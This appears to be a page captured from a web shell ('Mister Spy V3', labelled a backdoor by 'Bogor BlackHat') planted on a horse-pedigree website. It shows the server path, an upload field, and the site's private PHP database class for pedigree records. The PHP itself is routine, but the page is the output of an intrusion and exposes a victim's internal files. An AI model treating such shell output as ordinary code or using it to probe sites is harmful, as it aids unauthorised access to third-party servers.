Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/library/
Upload File :
Current File : /home/caballoscriollos/www/espanol/library/class.lotespedigree.php

<?php 

require_once('class.dbaccess.php');
require_once('class.lotepedigree.php');

class LotesPedigree extends DBAccess
{
	public function GetAll()
	{
		$sql = "SELECT *";
		$sql.= " FROM tblLotesPedigree";

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();

		while ($oRow = $oRes->GetRow())
		{
			$oLotePedigree = new LotePedigree();
			$oLotePedigree->ParseFromArray($oRow);

			array_push($arr, $oLotePedigree);

			$oRes->MoveNext();
		}

		return $arr;
	}
	

	public function GetById($IdLotePedigree)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblLotesPedigree";
		$sql.= " WHERE IdLotePedigree = " . DB::Number($IdLotePedigree);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oLotePedigree = new LotePedigree();
		$oLotePedigree->ParseFromArray($oRow);
		
		return $oLotePedigree;		
	}
	
	
	public function GetPedigree($IdLote, $IdTipoPedigree)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblLotesPedigree";
		$sql.= " WHERE IdLote = " 		. DB::Number($IdLote);
		$sql.= " AND IdTipoPedigree = " . DB::Number($IdTipoPedigree);
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oLotePedigree = new LotePedigree();
		$oLotePedigree->ParseFromArray($oRow);
		
		return $oLotePedigree;		
	}
	
	
	public function Create(LotePedigree $oLotePedigree)
	{
		$arr = array
		(
			'IdLote'			=> DB::Number($oLotePedigree->IdLote),
			'IdTipoPedigree'	=> DB::Number($oLotePedigree->IdTipoPedigree),
			'Nombre'			=> DB::String($oLotePedigree->Nombre),
			'NombrePadre'		=> DB::String($oLotePedigree->NombrePadre),
			'NombreMadre'		=> DB::String($oLotePedigree->NombreMadre)
		);
		
		if (!$this->Insert('tblLotesPedigree', $arr))
			return false;
			
		return $oLotePedigree;
	}
	
	
	public function Update(LotePedigree $oLotePedigree)
	{
		$where = " IdLotePedigree = " . DB::Number($oLotePedigree->IdLotePedigree);
		
		$arr = array
		(
			'IdLote'			=> DB::Number($oLotePedigree->IdLote),
			'IdTipoPedigree'	=> DB::Number($oLotePedigree->IdTipoPedigree),
			'Nombre'			=> DB::String($oLotePedigree->Nombre),
			'NombrePadre'		=> DB::String($oLotePedigree->NombrePadre),
			'NombreMadre'		=> DB::String($oLotePedigree->NombreMadre)
		);
		
		if (!DBAccess::Update('tblLotesPedigree', $arr, $where))
			return false;
			
		return $oLotePedigree;
	}
	

	public function Delete($IdLotePedigree)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdLotePedigree = " . DB::Number($IdLotePedigree);
		if (!DBAccess::Delete('tblLotesPedigree', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
	
	
	public function DeleteByIdLote($IdLote)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdLote = " . DB::Number($IdLote);
		if (!DBAccess::Delete('tblLotesPedigree', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat